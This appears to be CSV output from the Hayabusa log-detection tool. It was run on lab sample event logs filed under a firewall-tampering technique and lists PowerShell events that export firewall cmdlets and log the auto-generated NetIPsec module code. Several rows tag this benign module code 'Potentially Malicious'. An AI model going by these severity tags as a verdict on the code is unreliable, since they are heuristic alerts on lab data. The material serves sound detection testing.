+00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.654 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.654 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.655 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.655 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.656 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.658 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.659 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.660 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.Contains",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.Contains",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,Key('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 